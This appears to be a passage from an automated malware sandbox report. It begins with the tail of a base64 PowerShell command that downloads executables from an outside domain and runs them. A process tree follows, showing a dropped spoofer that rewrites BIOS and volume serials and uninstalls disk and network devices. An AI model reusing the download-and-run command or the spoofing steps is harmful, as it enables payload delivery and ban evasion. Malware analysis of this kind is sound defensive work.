QBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABtAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAYgBkAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHoAZwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABnAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBuAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBkAGYAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAGEAYwBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBpAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBoAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAeABuAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBjAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwBzAGYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG4AaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBoAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAcgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAZgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBtAG4AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGQAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQBlAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHIAcAB6ACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RMLL-9BFO
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RMLL-9BFO
        5⤵
        Executes dropped EXE
        
        PID:2120
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:712
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1080
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      Loads dropped DLL
      PID:528
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1033HP-TRGT20205AB
        5⤵
        Executes dropped EXE
        
        PID:1732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:2988
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21033HP-TRGT20205RV
        5⤵
        Executes dropped EXE
        
        PID:2212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2144
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81036HP-TRGT30954SG
        5⤵
        Executes dropped EXE
        
        PID:2404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1800
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:1568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2772
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51036HP-TRGT30954SL
        5⤵
        Executes dropped EXE
        
        PID:2240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2064
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41036HP-TRGT30954FA
        5⤵
        Executes dropped EXE
        
        PID:2684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2556
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61036HP-TRGT30954FU
        5⤵
        Executes dropped EXE
        
        PID:2996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:2588
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31036HP-TRGT30954DQ
        5⤵
        Executes dropped EXE
        
        PID:2532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:1736
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71036HP-TRGT30954MST
        5⤵
        Executes dropped EXE
        
        PID:2960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:820
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:1488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:1304
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1052HP-TRGT19160AB
        5⤵
        Executes dropped EXE
        
        PID:3044
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1916
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21052HP-TRGT19160RV
        5⤵
        Executes dropped EXE
        
        PID:2792
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2196
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81052HP-TRGT19160SG
        5⤵
        Executes dropped EXE
        
        PID:2532
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:2076
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:2588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2788
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51052HP-TRGT19160SL
        5⤵
        Executes dropped EXE
        
        PID:2192
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2848
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41052HP-TRGT19160FA
        5⤵
        Executes dropped EXE
        
        PID:1496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:3000
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61052HP-TRGT19160FU
        5⤵
        Executes dropped EXE
        
        PID:292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:2224
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31052HP-TRGT19160DQ
        5⤵
        Executes dropped EXE
        
        PID:2660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:2620
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71052HP-TRGT19160MST
        5⤵
        Executes dropped EXE
        
        PID:2592
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:2608
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:2804
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:3048
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1069HP-TRGT7366AB
        5⤵
        Executes dropped EXE
        
        PID:2476
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1948
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21069HP-TRGT7366RV
        5⤵
        Executes dropped EXE
        
        PID:1704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1972
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81069HP-TRGT7366SG
        5⤵
        Executes dropped EXE
        
        PID:1996
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:2916
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2068
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51069HP-TRGT7366SL
        5⤵
        Executes dropped EXE
        
        PID:2008
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2320
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41069HP-TRGT7366FA
        5⤵
        Executes dropped EXE
        
        PID:1588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2032
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61069HP-TRGT7366FU
        5⤵
        Executes dropped EXE
        
        PID:1356
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1620
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31069HP-TRGT7366DQ
        5⤵
        Executes dropped EXE
        
        PID:868
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:988
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71069HP-TRGT7366MST
        5⤵
        Executes dropped EXE
        
        PID:1332
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:1764
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: PM9G-8GIE
      4⤵
      PID:2064
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: PM9G-8GIE
        5⤵
        Executes dropped EXE
        
        PID:1488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TAGO-868K
      4⤵
      PID:400
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TAGO-868K
        5⤵
        Executes dropped EXE
        
        PID:1304
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: M1I4-DHGN
      4⤵
      PID:2792
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: M1I4-DHGN
        5⤵
        Executes dropped EXE
        
        PID:628
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BO38-EH36
      4⤵
      PID:836
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BO38-EH36
        5⤵
        Executes dropped EXE
        
        PID:2784
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: DCPZ-6B0M
      4⤵
      PID:2660
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: DCPZ-6B0M
        5⤵
        Executes dropped EXE
        
        PID:2076
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UU08-FRTC
      4⤵
      PID:2196
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UU08-FRTC
        5⤵
        Executes dropped EXE
        
        PID:2592
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 824E-4GKH
      4⤵
      PID:2100
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 824E-4GKH
        5⤵
        Executes dropped EXE
        
        PID:948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SK00-MIVE
      4⤵
      PID:2192
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SK00-MIVE
        5⤵
        Executes dropped EXE
        
        PID:2788
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: KSGA-URCU
      4⤵
      PID:576
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: KSGA-URCU
        5⤵
        Executes dropped EXE
        
        PID:820
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 03C0-KNH7
      4⤵
      PID:2884
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 03C0-KNH7
        5⤵
        Executes dropped EXE
        
        PID:2060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PUTR-MPFV
      4⤵
      PID:1672
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PUTR-MPFV
        5⤵
        
        PID:2116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UP0H-U19D
      4⤵
      PID:860
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UP0H-U19D
        5⤵
        
        PID:1844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: FT9V-J64C
      4⤵
      PID:1260
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
